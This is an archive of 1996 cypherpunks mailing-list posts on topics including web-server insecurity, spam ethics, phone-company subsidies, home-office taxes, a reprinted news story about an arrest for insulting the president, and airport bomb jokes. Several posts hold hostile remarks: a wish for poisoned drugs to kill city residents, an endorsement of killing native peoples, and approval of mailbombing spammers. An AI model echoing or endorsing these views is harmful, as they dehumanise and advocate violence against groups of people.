http://ourworld.compuserve.com/homepages/justforfun/prime.htm

The other is called SETI@home and apparently going to use idle time on
people's computers (a screen saver) to search for patterns in data from
Arecibo.  The report says the project will be set up by Woody Sullivan
of University of Washington, Seattle and will operate out of a server
in Berkeley.  (I wasn't able to locate any information about this on
the web.)

-- 
=====================================================================
Joel.Morgan@Helsinki.FI              http://blues.helsinki.fi/~morgan
    "Over the mountains there are mountains."   -- Chang-rae Lee 
=====================================================================




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@huge.cajones.com (Huge Cajones Remailer)
Date: Wed, 21 Aug 1996 13:56:45 +0800
To: cypherpunks@toad.com
Subject: Re: Hackers invade DOJ web site
In-Reply-To: <199608202331.SAA25854@snoopy.vetmed.auburn.edu>
Message-ID: <199608210335.UAA16038@fat.doobie.com>
MIME-Version: 1.0
Content-Type: text/plain


> Since we don't know how the intruders broke in, we can only speculate.  I
> can think of several scenarios where cryptographic techniques could help.
> I can also think of several where they wouldn't.  When you've only got 20
> seconds to explain to a non-technical audience, I don't think it's dishonest
> to say that it might have prevented it.

All webservers (except maybe Spinner?) are riddled with buffer overrun
bugs and other similar security holes.  If you run a webserver, you
should basically assume that anyone who really wants a shell on your
machine can get one.  Grab your favorite webserver and grep for
sprintf.

Crypto?  Get real.  The lock on the door matters little when you've
left the window wide open.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Ross Wright" <rwright@adnetsol.com>
Date: Wed, 21 Aug 1996 13:46:44 +0800
To: Vipul Ved Prakash <rich@c2.org>
Subject: Re: Spamming (Good or Bad?)
Message-ID: <199608210340.UAA06334@adnetsol.adnetsol.com>
MIME-Version: 1.0
Content-Type: text/plain


On Or About 20 Aug 96, 18:09, Rich Graves wrote:

> On Wed, 21 Aug 1996, Vipul Ved Prakash wrote:
> 
> > I don't know if there has been much discussion on the ethics of
> > spamming here? Is spamming free speech? 
> 
> Yes.
> 
> So is mailbombing the motherfucker, or more productively, virtually
> picketing his ISP until they kick him off for net abuse

That is the kind of self righteous crap that gives me the creeps!!!

> 
> Ethically? We don't talk ethics much here, but I'd say it's highly
> unethical to abuse a service paid for by the pooled resources of
> many. 

I pay for my net access.  I pay for my Sunday paper, it's full of ads 
too!!  Ethics???  Let's rat out on the EVIL spammers!!  Let's turn 
them into thier ISP!!!  That's a load of CRAP!!!!

Ross

===========
Ross Wright
King Media: Bulk Sales of Software Media and Duplication Services
http://www.slip.net/~cdr/kingmedia
Voice: 415-206-9906




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Hettinga <rah@shipwright.com>
Date: Wed, 21 Aug 1996 13:58:28 +0800
To: cypherpunks@toad.com
Subject: Re: CIA Contra Crack and LA Gangs (fwd)
In-Reply-To: <Pine.GUL.3.95.960820100659.8541A-100000@Networking.Stanford.EDU>
Message-ID: <v0300780cae4008975ab2@[206.119.69.46]>
MIME-Version: 1.0
Content-Type: text/plain


At 5:13 PM -0400 8/20/96, Brad Dolan wrote:

> p.s. Donna Rice has lately been running point for a regulate-the-internet 
> front group.  I wouldn't put anything past her.

Which reminds me of a story. 

First, however, a joke, which in hindsight taught me about the propagation of information across geodesic networks, that is, capital market trading rooms, long before I had ever heard of either Peter Huber or geodesic networks. 


To wit, 

Q: What did Donna Rice say to the press when they caught her leaving Gary Hart's house?  

A: She said she was taking a poll. <"Pole", get it? Hyuk!>


The reason I remember this paragon of modern political humor is that I heard it no more the 30 minutes after the story broke on the AP wire machine in the Morgan Stanley branch where I was clerking at the time. I heard the joke from trading assistant, who in turn had heard it over the "hoot & holler" line which wired Morgan's various trading desks together with a bunch of permanently open-miked full-duplex speakerphones. The joke originated somewhere else, and was probably told to someone at Morgan's New York office over a direct "ring-down" line linking one company's trading desk to another.

I thought at the time that someone should do a study of the velocity of information flow in the markets, using jokes as information proxies. I've since outgrown such foolishness, though I keep expecting to hear about someone's Ph.D thesis on the topic someday. :-). 


But, of course, that's not the story I *wanted* to tell. *This* one, of course, has absolutely no crypto relevance whatever...

All these conspiracy theories about Donna Rice and George Bush got me to remember something. Brian Smith, who shot that famous Pulitzer-winning(!) picture of Gary Hart with Ms. Rice seated on his lap and the "Monkey Business" lifering in the background, was a friend of mine at Missouri. 

Clever boy, Brian was. When he graduated from the Missouri School of Journalism (Missouri's most famous, er, "professional" school [God help us all], with alums like Carl Rowan, and Dan Rather, and John Chancellor, etc.), he managed to produce, out from under his graduation robes, his entire motor-driven Nikon SLR outfit, complete with strobe apparatus, and took a series of pictures of himself graduating, right down to the handshake from Van Gorton Sauter, the President of CBS News. 


I always wondered what that masonic pyramid, with the eyeball on top, was doing tattooed on Brian's forehead. Now I know. Beware the Illuminati.

Cheers,
Bob Hettinga







-----------------
Robert Hettinga (rah@shipwright.com)
e$, 44 Farquhar Street, Boston, MA 02131 USA
"'Bart Bucks' are not legal tender."
                -- Punishment, 100 times on a chalkboard,
                       for Bart Simpson
The e$ Home Page: http://www.vmeng.com/rah/






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Wed, 21 Aug 1996 15:18:37 +0800
To: Brian D Williams <cypherpunks@toad.com
Subject: Re: phoneco vs x-phones
Message-ID: <199608210437.VAA16416@mail.pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 02:21 PM 8/20/96 -0700, Brian D Williams wrote:
>
>Disclaimer: The opinions expressed are my own, I do not speak for
>Ameritech or it's alliance partners.

>Jim Bell replies:
>
>>If that is the main difference in costs, then we should abandon
>>those regs. Another big cost is billing, which could be eliminated
>>if usage were unmetered.   In any case, I tend to agree:  Make
>>these changes, eliminate the LD/local subsidy, and  the LD
>>companies would have no problem (at least domestically) competing
>>against Internet phone.   (International may be a different story,
>>because foreign telcos tend to be owned by countries.)
>
>Yes compliance costs are a sore subject. Billing costs are actually
>very cheap,(the mainframes are on the floor above me) the
>difference between sending a metered bill or a flat rate bill is
>tiny. Really tiny (NDA). The local/long distance subsidy was
>eliminated at breakup, but long distance companies do have to pay
>to use local networks,

"the king is dead, long live the king!"???

The long distance companies are not "using local networks," your customers 
are...to connect to those long distance companies.  And any payments LD 
companies make to you are, indeed, a subsidy.   Tell me, how much is this 
_subsidy_, exactly?

BTW, in case you doubt this assessment, let's do a fair comparison, shall 
we?  Let's suppose, for the moment, that the amount of the subsidy is 3 
cents per minute.  (a figure I heard around here, recently.)  As an 
alternative, the phone company would presumably be entitled to be served by 
phone lines, at say $30 per month or so, through which their customers reach 
them.  $30 per month is $1 per day or 4 cents per hour or about 0.07 cents 
per minute.   3 cents doesn't equal 0.07 cents, now does it?!?

Tell me again how "the local/long distance subsidy was eliminated at 
breakup."  Tell me another one, daddy...


>but as competition heats up these rates are
>dropping and new players (competitors) join the table, Or they can
>build their own. ;) 

How has this remaining SUBSIDY dropped over time, assuming it has?  When is 
it scheduled to drop to zero?


>One of the fun turns of events might be that the threat of x-phones
>might lead the RBOC's to actually turn into an ISP's! We could pull
>this off at amazing speed. (if you can't beat them, join them!) We
>are after all one of the four major nodes of the Internet......

First, you need to figure out how to supply ISDN for a REASONABLE charge, 
like "no extra charge!" to customers.  It's been over 16 years after I first 
heard of ISDN.  At the time, it seemed like a wonderful idea...against the 
300 baud modems then in use.  Against modern 31K modems that you only have 
to pay for...ONCE...ISDN seems mighty lame.

Face it, ISDN used to be a good idea.  But it's just barely shown up the 
moment it's hit the end of its marketing window.  ISDN will have a marketing 
lifetime for maybe a couple of more years, and only then because you can't 
put more bits through a 3.4 khz passband.

Not to mention all the bullshit propaganda that claimed that with ISDN, you 
wouldn't have to buy any modems.  Well, maybe that's just because they 
didn't CALL them modems, but they charged way more for an essentially 
indistinguishable function.  Can you say, "Fraud"?  I knew you could!

Okay, go ahead, charge a little extra for ISDN.  How much more?  Well, let's 
see:  31K modems sell for $99.  ISDN is four times faster, so let's say it's 
worth four times more, or $400.  Amortized over 10 years, that's about $3.60 
per month.

Fair enough?




Jim Bell
jimbell@pacifier.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Paul S. Penrod" <furballs@netcom.com>
Date: Wed, 21 Aug 1996 15:29:05 +0800
To: "Timothy C. May" <tcmay@got.net>
Subject: Re: Taxes on Internet access prediction
In-Reply-To: <ae3f4d89020210046ca3@[205.199.118.202]>
Message-ID: <Pine.3.89.9608202145.A13012-0100000@netcom>
MIME-Version: 1.0
Content-Type: text/plain




On Tue, 20 Aug 1996, Timothy C. May wrote:

> At 5:54 PM 8/20/96, Mike McNally wrote:
> 
> >Sure, but clearly that's not exclusively the case.  (Amazingly enough
> >to some might be the fact that my for-work e-mail volume far exceeds
> >my not-for-work volume.)  Hopefully I haven't brought too much shame
> >to my employer.
> >
> >In any case, with the IRS it's often less a matter of common sense
> >than what they happen to decide is The Law.  Witness the changes in
> >laws about what constitutes a "home office".  Currently, if you're
> >(let's say) a freelance plumber who maintains a legitimate office
> ...
> 
> Caveat: I'm not a defender of income taxes, of course. Nor am I a defender
> of the IRS.
> 
> However, on the "home office" situation, most of the examples I encounter,
> in talking to friends, are clearly scams to save a thousand bucks (or less)
> on their tax returns. Most of my friends who try to deduct a room in their
> house because they've put their computer there are clearly not using "20%"
> or "25%" or whatever of their house as a business.
> 
> For those who really do actually use a room in their home for building
> things, for meeting with clients, for operating a home business of some
> sort, then I think the IRS will have no problems allowing it. (If the
> subject even comes up, in an audit. There are some reports that attempting
> to declare a home office increases ones chances of being audited....)
> 
> As the saying goes, consult a competent expert. A few books detail the
> expected amount of work that must be done in a "home office," and whether
> one is likely to qualify.

As one who has regularly maintained a home office for many years, there 
are a couple of points on the above issue that should be made.

First, the stories about increased audits are true. This is one of the 
"red flag" items on Schedule C that the IRS looks for. If the types and 
amount of deductions taken for the space utilized evens smells like there 
is possible overlap with the interest deduction for the mortgage, it gets 
kicked out for review. This does not mean you get a letter or a phone 
call, but none the less, the more interest there is in the return the 
greater the chances for a tango downtown.

Schedule C has been a target for many years(especially since HB 1706) 
went to law concerning contract employee status vs consulting and the 
famous 20 point list et al. I had a 3 hour conversation with a regional 
supervisor of the IRS about this list and the impossiblity of any 
business (even one the size of IBM) and/or person qualifying as a 
contractor/consultant on all 20 points. He informed my unoffically that 
the litmus test centers around a majority of the conditions being 
satisfied of which one of the important ones is a home office, else a 
consultant is (for tax purposes) a contract employee and gets raped in 
both directions. You can't deduct for business expenses because you are 
technically an employee of the client, plus you have to pay the higher 
rate of self employment (15.16% or some such non-sense). Fun...

For the plumber that works "offsite" as well as the consultant, the home 
office is a legitimate deduction so long as they can prove that they set 
their own schedule and hours, have more than one "client", and generally 
operate as a "business". This usually means registering the business 
address at the residence, business license, checks, etc. and setting 
aside the workspace necessary to accomplish the adminstrative tasks to 
keep the business running. Taking a picture of the office helps alot, if 
there are questions about the legitimacy.

As for the closet consultant who looks for a cheap fast deduction, I have 
zero sympathy if they get caught. If it isn't legitmate, it isn't worth 
the risk. It will catch up with you. Fascist state or not, these are the 
rules of the game: Declare everything. Deductions are negotiable.

 > 
> As one data point, I have derived nearly all of my income over the past 10
> years from investments. And yet the "work" needed to be done on my computer
> is such a tiny fraction of my overall use of it that I don't even try to
> write off my various computers as "investment expenses." Your mileage may
> vary.
> 
> And I certainly have not tried to write off a room in my house as a home
> office. (As it happens, I need few of the "office" resources, so I have my
> PowerMac and 17" monitor sitting beside my recliner in the family room of
> my house, where I can lie back, log in, and bliss out in cyberspace.)
> 
> --Tim May

Again the deduction and the risk involved in taking it depends on the 
situation. If you are investing and/or running the numbers on the market, 
then there may not be enough there to make it worth your while. I have a 
client of mine who grosses 7+ figures - net from his commodities, and all 
he does is take the losses and never expenses anything else. There is no 
need to, as it's such a small part of his income as to make it ridiculous.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: snow <snow@smoke.suba.com>
Date: Wed, 21 Aug 1996 14:39:00 +0800
To: Stephen Cobb <stephen@iu.net>
Subject: Re: US Taxes on X-Pats (getting off topic)
In-Reply-To: <1.5.4.32.19960820173846.007137e4@iu.net>
Message-ID: <Pine.LNX.3.93.960820221430.391B-100000@smoke.suba.com>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 20 Aug 1996, Stephen Cobb wrote:

> At 05:32 PM 8/19/96 -0400, you wrote:
> "we killed the natives so this land is our land and the rest of you f@*k-off"

     That is the way Civilization usually works. 

Petro, Christopher C.
petro@suba.com <prefered for any non-list stuff>
snow@smoke.suba.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Paul S. Penrod" <furballs@netcom.com>
Date: Wed, 21 Aug 1996 15:34:11 +0800
To: Ross Wright <rwright@adnetsol.com>
Subject: Re: Spamming (Good or Bad?)
In-Reply-To: <199608210044.RAA02892@adnetsol.adnetsol.com>
Message-ID: <Pine.3.89.9608202254.A13012-0100000@netcom>
MIME-Version: 1.0
Content-Type: text/plain




On Tue, 20 Aug 1996, Ross Wright wrote:

> On Or About 20 Aug 96, 16:23, Jim Gillogly wrote:
> > 
> > Vipul Ved Prakash <vipul@pobox.com> writes:
> > >I don't know if there has been much discussion on the ethics of
> > >spamming here? Is spamming free speech? 
> > 
> 
> > I oppose spamming because it's rude and inefficient, lowering the
> > S/N everywhere it happens.  Market droids
> 
> Market Droids????  As a salesman I take offence at this slur.

Don't bother. There is a difference between marketing and sales. Lighten 
up. Good salesmen are born with the ability - marketing is a bad attempt 
at appyling engineering principles to the same.

As for spamming, I get enough of it via snail-mail, I don't want to see 
it in my Inbox too. And, for the record, there are lots of people out 
there who pay on the bulk charge, not by time. Sending advertising or 
junk mail to these folks costs them money, maybe not much for the one 
message you sent, but several thousand over a month of a quarter add up 
to real money.

There is a time and place for legitimate advertising. I am sure that 
given time and impetus, a number of clear channel venues will open up to 
allow precision marketing and sales to happen electronicly. 

At the moment, it's bad nettiquette...

...Paul





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Olsen <alano@teleport.com>
Date: Wed, 21 Aug 1996 15:48:26 +0800
To: Frank Stuart <fstuart@vetmed.auburn.edu>
Subject: Re: Hackers invade DOJ web site
Message-ID: <2.2.32.19960821051709.00e4b758@mail.teleport.com>
MIME-Version: 1.0
Content-Type: text/plain


At 06:31 PM 8/20/96 -0500, Frank Stuart wrote:
>Since we don't know how the intruders broke in, we can only speculate.  I
>can think of several scenarios where cryptographic techniques could help.
>I can also think of several where they wouldn't.  When you've only got 20
>seconds to explain to a non-technical audience, I don't think it's dishonest
>to say that it might have prevented it.
>
>Off the top of my head, here are a couple examples:
>
>   1. It's possible that a DOJ employee logged in from a remote site while
>      the intruders were snooping somewhere along the way.  If the link had
>      been encrypted, that would have made things much more difficult or
>      impossible for the attackers.
>
>   2. Perhpas the intruders used IP spoofing and .rhosts to break in.  If
>      machines had to be cryptographically authenticated, a rsh from the
>      wrong machine wouldn't work.

One of the best comments I have seen (from another list) was:

"These are the people who want us to escrow our encryption keys with them
and yet they can't protect their own web site."

I think this can be used as a very valid example as to why they are
untrustworthy to be in charge of keeping anything private and/or protected,
let alone private encryption keys.

---
|  "Remember: You can't have BSDM without BSD. - alan@ctrl-alt-del.com  "|
|"The moral PGP Diffie taught Zimmermann unites all| Disclaimer:         |
| mankind free in one-key-steganography-privacy!"  | Ignore the man      |
|`finger -l alano@teleport.com` for PGP 2.6.2 key  | behind the keyboard.|
|         http://www.teleport.com/~alano/          | alano@teleport.com  |





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Z.B." <zachb@netcom.com>
Date: Wed, 21 Aug 1996 16:08:30 +0800
To: Alan Olsen <alano@teleport.com>
Subject: Re: Husband/Wife jailed for saying Clinton Sucks
In-Reply-To: <2.2.32.19960821051717.00ee312c@mail.teleport.com>
Message-ID: <Pine.3.89.9608202214.A15288-0100000@netcom18>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 20 Aug 1996, Alan Olsen wrote:

> At 08:23 PM 8/20/96 -0700, you wrote:
> 
> >A more detailed version of this story was posted on talk.politics.guns 
> >last week.  I could dig it up and post it if anyones interested.
> 
> Post it.  I would like to see it at least...
> 
You got it...


Published in Washington, D.C.   July 9, 1996
Insult to Clinton leads to 2 arrests

------------------------------------------------------
By Ruth Larson
THE WASHINGTON TIMES
------------------------------------------------------
[A] Chicago-area couple were arrested on charges of
    disorderly conduct and interrogated for more than
12 hours last week, simply because the woman told
President Clinton exactly what she thought of him.
  Last Tuesday, Mr. Clinton made an impromptu stop at
the "Taste of Chicago" festival in Grant Park at
midafternoon.
  According to her husband, Patricia Mendoza, angered
and upset by the recent deaths of 19 U.S. airmen in
Saudi Arabia, told the president, "You suck, and
those boys died!"
  Once the president left the area, Secret Service
agents and Chicago police converged on Mrs. Mendoza
and accused her of threatening the president, a
charge her husband, Glenn, vehemently denies.
  "It doesn't take a rocket scientist to figure out
that if my wife had threatened the president -- which
she did not -- I can guarantee we wouldn't have been
locked up on charges of disorderly conduct," the
Westchester, Ill., man told The Washington Times in a
telephone interview last night.
  Mr. Mendoza served in the Navy for 4 1/2 years, and
he was on a ship off the Lebanese coast when the 1983
bombing of the U.S. Marine barracks in Beirut killed
241 Marines and sailors. "I didn't sit on an aircraft
carrier for four years to be railroaded by a bunch of
Secret Service agents," he said.
  Secret Service spokesman Ar nette Heintze said:
"People don't get locked up just for saying, 'You
suck.' You could say that all day long and it's not a
violation of law or local ordinances."
  Mr. Heintze insisted that Mrs. Mendoza "made a
threatening statement" to the president, but he
refused to elaborate, saying that the matter was
under investigation. "It's a situation that happens
from time to time, but it's something we take very
seriously," he said.
  The incident sparked a media frenzy in Chicago but
had yet to surface on the East Coast until radio
talk-show host G. Gordon Liddy discussed it on his
nationally syndicated program yesterday.
  Mr. Liddy told The Times: "I think it's outrageous.
Everybody agrees that if there's a threat, the Secret
Service clearly can detain the individuals and do an
investigation.
  "But 'You suck, those boys died' is not a threat.
It's an expression of anger, contempt or ridicule.
It's wrong for the Secret Service to detain someone
if there's no threat," he said.
  Mr. Mendoza, who owns a small electronics firm, and
his wife were at the festival with their employees,
unaware that the president was coming. Suddenly, he
recalled, the Secret Service descended on the park,
throwing up barriers and preventing anyone from
leaving the area.
  A black car drove up, Mr. Clinton leaped out and
began shaking hands with onlookers, and Mrs. Mendoza
found herself face to face with the president, Mr.
Mendoza said.
  Mr. Clinton shook her hand and she reacted by
pulling it back and telling him, "You suck, those
boys died," Mr. Mendoza said. He said the president
looked at her, then motioned to an assistant as he
moved along the rest of the line. "He wasn't
pleased," Mr. Mendoza said.
  Soon afterward, Mr. Mendoza said, Secret Service
agents began accusing his wife of threatening the
president's life. At that point, he said, he began
directing his wife: "Trish, don't say anything. We
need a lawyer."
  An officer told him to shut up and he responded,
"Screw you. I have a right to tell my wife to get a
lawyer when she's getting interrogated by the Secret
Service," Mr. Mendoza said.
  He concluded, "The fact is, I was arrested because
I was swearing at my wife."
  Chicago police arrested the couple at the request
of the Secret Service. The Mendozas were questioned
until their release on personal-recognizance bond at
4 a.m.
  Mr. Mendoza denied any political ill will toward
Mr. Clinton.
  "I'm apolitical. I was in the military, had a good
record, have a wife and two kids, a small business,"
he said. But he fears the incident will be
exaggerated because of election-year politics and the
Democratic National Convention coming to Chicago next
month.
  "They're making us look like Bonnie and Clyde,
Republican poster children. And that's not who we
are," Mr. Mendoza said.

------------

Published in Washington, D.C. July 10, 1996



By Ruth Larson
THE WASHINGTON TIMES

   The U.S. Secret Service yesterday sought to distance itself from
the arrest of a Chicago-area couple who "insulted" President
Clinton during his visit to a festival there last week.
   Yet even as it was discounting its role in the arrests of Glenn
and Patricia Mendoza, the Secret Service was consulting with
the U.S. attorney in Chicago about criminal charges against the
couple.
   And Secret Service and Chicago police spokesmen differed on
several details of the incident, which is triggering growing
outrage on talk radio and even from a prominent Republican
member of Congress.
   The Mendozas were at the Taste of Chicago festival in Grant
Park on July 2 when Mr. Clinton dropped by to shake hands in
the crowd. Mrs. Mendoza, upset over last month's bombing deaths
of 19 U.S. airmen in Saudi Arabia, told the president as he took
her hand: "You suck, and those boys died."
   Mr. Mendoza said the president looked at her, then motioned
to an assistant as he moved along shaking hands.
   After the president left, Secret Service agents accused Mrs.
Mendoza of threatening the president. Her husband stepped in
and ordered her not to say anything until they called a lawyer.
   "That is not accurate," Secret Service spokesman Arnette
Heintze said yesterday of the Men dozas' version. "A direct
threat was made, but I'm not going to elaborate. Mrs. Mendoza has
a right to fair representation of her case, as does the
prosecution, and the newspaper is not the proper place to air
this case.
   "We were there because a verbal threat was made to the
president, and the Secret Service is responsible for the
physical safety of the president."
   Rep. Robert Livingston, Louisiana Republican, is among
those angered by what he called Secret Service overreaction.
"Is this going to be the norm? If you criticize the president,
are you going to be arrested by a bunch of federal agents and
thrown in jail overnight? That's a frightening thought."
   "I think on the heels of this FBI investigation, with these
FBI files in the White House, this kind of symbolizes an
appalling lack of respect for human rights and for the rights of
people to speak out in this country," Mr. Livingston said in a
C-SPAN interview.
   Mr. Heintze, who complained about continuing media
interest in the Mendoza matter, said the Secret Service thought
there was no need to arrest the couple at the festival because
Mr. Clinton had moved on. He said Chicago police arrested the
Mendozas because of their conduct after the president left.
   "The Mendozas refused to follow police directions, and so
they opted to arrest them. We supported them in their action,
but it was an independent act by the police.
   "The arrest was separate and incidental to our questioning of
the Mendozas," Mr. Heintze said.
   The Mendozas were charged with disorderly conduct, a
misdemeanor, and were interrogated for 12 hours before they
were released. No federal charges have been filed.
   The case has been complicated by conflicting details from the
principals:
   The Chicago Police Department says it is handling the
matter. Department spokesman Patrick Camden said yesterday,
"There's no Secret Service involvement, to my knowledge." The
couple are scheduled to appear in misdemeanor court Aug. 27.
   But Ralph Grayson, special agent in charge of the Secret
Service's Chicago office, said his agency has an "ongoing
investigation" into the matter.
   The Secret Service said Mrs. Mendoza made a "threatening
statement" to the president that was far more serious than the
one Mrs. Mendoza says she made, but it declined to say what the
threat was.
   Mr. Camden said Mrs. Mendoza had hinted at "blowing up
the president." "She said something to the effect that 'He [Mr.
Clinton] should have been blown up instead of the 19
servicemen.'"
   Mr. Heintze said emphatically, "That is not accurate, and
don't try to find out what the threat was."
   A Chicago police spokesman said yesterday that the Secret
Service had not asked them to arrest the Mendozas, as was
previously reported, but that the couple were arrested for
creating a disturbance.
   The extent to which alcohol contributed to the incident is
also in question.
   Mr. Camden said: "Sure, there was alcohol. They both had
been drinking. A rational person doesn't act that way. This was
a family event, there were kids around, and these people were
saying a lot more than 'You suck.' In fact, it rhymed with
'suck.'"
   Mr. Mendoza acknowledged that when Secret Service agents
accused his wife of threatening the president's life, "I was
screaming at the top of my lungs. Granted, I was angry, scared,
upset, and if that's disorderly, I guess so."
   He said he was not drunk. Mr. Mendoza said he repeatedly
demanded that he be given a blood breath test, but the police
refused.
   "We wouldn't do a Breathalyzer test, even if he asked," the
police spokesman said.
   "We are so sensitive about First Amendment rights," said the
Secret Service spokesman. "I can assure you that if the Secret
Service was doing anything contrary to the Constitution, the
president would not tolerate it, and he would make big
changes," he said.


* Joyce Price contributed to this report.

---
 þ KWQ/2 1.2i NR þ Friends don't let friends run Windows.
                                                                                                        





---

Zach Babayco

zachb@netcom.com  <----- finger for PGP public key
http://www.geocities.com/SiliconValley/Park/4127








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: snow <snow@smoke.suba.com>
Date: Wed, 21 Aug 1996 15:12:46 +0800
To: Alan Horowitz <alanh@infi.net>
Subject: Re: CIA Contra Crack and LA Gangs (fwd)
In-Reply-To: <Pine.SV4.3.91.960820191108.9214E-100000@larry.infi.net>
Message-ID: <Pine.LNX.3.93.960820223234.391E-100000@smoke.suba.com>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 20 Aug 1996, Alan Horowitz wrote:

> I wish they'd get back in the business, but add an overt poison to the 
> product.
> Clean out the shit from the cities. Long live Darwinism.

     Really? 

     What are you drinking right now? 

Petro, Christopher C.
petro@suba.com <prefered for any non-list stuff>
snow@smoke.suba.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: William Knowles <erehwon@c2.net>
Date: Wed, 21 Aug 1996 15:42:03 +0800
To: Lucky Green <shamrock@netcom.com>
Subject: Re: [NOISE] Airport legal question
In-Reply-To: <printing.1140.013575CD@explicit.com>
Message-ID: <Pine.SUN.3.94.960820223028.7867F-100000@infinity.c2.net>
MIME-Version: 1.0
Content-Type: text/plain


Lucky,
 
>I know that it is a violation of federal law to joke about explosives at 
>the X-ray machine. Would an "I love Explosives" sticker on carry-on 
>luggage violate any laws?
 
Dunno, But you might get a kick out this from The Chicago Reader that 
published a list of the "bomb threats" made at O'Hare International 
airport a few weeks back.
  
7/18:  "I have nothing other than the bomb I am going to put on the plane."
7/18:  "I have a bomb that's going to go off in 30 seconds."
7/18:  "You mean the bomb I have in my bag?"
7/19:  "I don't have an ID, but I have a bomb."
7/21:  "There's a bomb in the bag in my hand."
7/23:  "I don't have a bomb in the bag."
7/23:  "I got a bomb in my bag to kill everyone here."
7/24:  "Well no, I left my pipe bomb at home."
7/25:  "The one that looks like [there's] a bomb in it."
7/26:  "I have a bomb in my bag.  Boom."
7/27:  "Where should I put the bomb?"
7/27:  "No, nothing but a bomb."
7/31:  "Are you checking for bombs?  I've got a bomb in my bag."
7/31:  "I have some explosives to transport."
8/1:  "It's not as if we were Swedish and here to blow up the airport."
8/2:  Offender:  "It's a bomb in the bag."  Witness:  "That's not funny."
Offender:  "I'm not playing."
8/3  "I have a bomb."

 
-- 

William Knowles
erehwon@c2.org


--
William Knowles    <erehwon@c2.org>
PGP mail welcome & prefered / KeyID 1024/2C34BCF9
PGP Fingerprint 55 0C 78 3C C9 C4 44 DE   5A 3C B4 60 9C 00 FB BD
Finger for public key
--
Vote for Harry Browne in November -- http://www.HarryBrowne96.org






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Graves <rich@c2.org>
Date: Wed, 21 Aug 1996 16:15:16 +0800
To: cypherpunks@toad.com
Subject: Re: "Utilization Review"
In-Reply-To: <199608210220.TAA19927@netcom8.netcom.com>
Message-ID: <Pine.GUL.3.95.960820224642.13603B-100000@Networking.Stanford.EDU>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 20 Aug 1996, Bill Frantz wrote:

> Do you want to share the risk of routine medical care?  Or do you just want
> to share the risk of catastrophic illnesses and accidents?  Or do you want
> to keep it all private.  What you pay for, you can keep private.  What they
> pay for, they can review.  Your choice.

Oh, that's a different kettle of fish entirely. As a matter of fact I do
have catastrophic coverage only ($2500 annual deductible and other
limitations), but were I less hale and youthful, or had I a family, I would
probably opt for "managed care."

However, you'll find that catastrophic coverage really isn't that much
cheaper than full "managed care," because without intimate knowledge of my
habits and detailed records of regular doctor's visits, the insurance
company doesn't trust me as much as it trusts a "managed care" patient.

-rich





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Graves <rich@c2.org>
Date: Wed, 21 Aug 1996 16:14:51 +0800
To: cypherpunks@toad.com
Subject: Re: Spamming (Good or Bad?)
In-Reply-To: <199608210340.UAA06334@adnetsol.adnetsol.com>
Message-ID: <Pine.GUL.3.95.960820225659.13603C-100000@Networking.Stanford.EDU>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 20 Aug 1996, Ross Wright wrote:

> On Or About 20 Aug 96, 18:09, Rich Graves wrote:
> 
> > On Wed, 21 Aug 1996, Vipul Ved Prakash wrote:
> > 
> > > I don't know if there has been much discussion on the ethics of
> > > spamming here? Is spamming free speech? 
> > 
> > Yes.
> > 
> > So is mailbombing the motherfucker, or more productively, virtually
> > picketing his ISP until they kick him off for net abuse
> 
> That is the kind of self righteous crap that gives me the creeps!!!

Good. That's called deterrence.* The market decides.

>From your earlier message, though, describing the "spamming" you do, I
really don't see you as needing deterrence. When I hear "spam" I think of
the Jeff Slaton/Vernon Hale/Crazy Kev/John Reese variety of carpet-bombing
both Usenet and millions of email addresses indiscriminately. OTOH, if you
really target your audience well, especially if a human and not a bot is in
charge of selecting prospects, then I'd call that "cold calling,"  not
"spamming." Unsolicited email is moderately annoying, but I don't think it's
anything to complain about. I filter all mail from unknown addresses anyway. 

* - The cool thing about this kind of deterrence is, since you're only
defending virtual turf, you can sabre-rattle to your heart's content without
worrying about having to actually follow through.

-rich





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Date: Wed, 21 Aug 1996 13:55:36 +0800
To: cypherpunks@toad.com
Subject: Edited Edupage, 18 Aug 1996
Message-ID: <01I8ILKTLJ809JDB7O@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


From:	IN%"educom@educom.unc.edu" 18-AUG-1996 23:56:45.22

>*****************************************************************
>Edupage, 18 August 1996.  Edupage, a summary of news about information
>technology, is provided three times a week as a service by Educom,
>a Washington, D.C.-based consortium of leading colleges and universities
>seeking to transform education through the use of information technology.
>*****************************************************************

	Speaking of Net-in-Orbit (while distributed datahavens have their
points, sometimes you'd prefer not to have a given chunk of data on your
hard drive - even encrypted with a passphrase), what's the physical setup
for rewriteable optical drives? Are there any methods of doing those that
will work OK in orbit?

>ECHOSTAR TO DELIVER DATA, TOO
>EchoStar Communications has successfully completed a public test of the
>technology it will use in cooperation with Intel Corp. and Comstream to
>deliver data via satellite to subscribers.  Transmission rates could be
>several megabits per second, says EchoStar's director of program management,
>who adds that the opportunity to download Web content at higher speeds is
>attractive to people hampered by slow phone lines.  "If the download could
>be made quickly and it could be stashed on their hard drive, that might be
>something they'd be interested in," he says.  In the recent test,
>subscribers who use EchoStar's system to receive video and audio content
>were given cards to install in their PCs, enabling them to receive data as
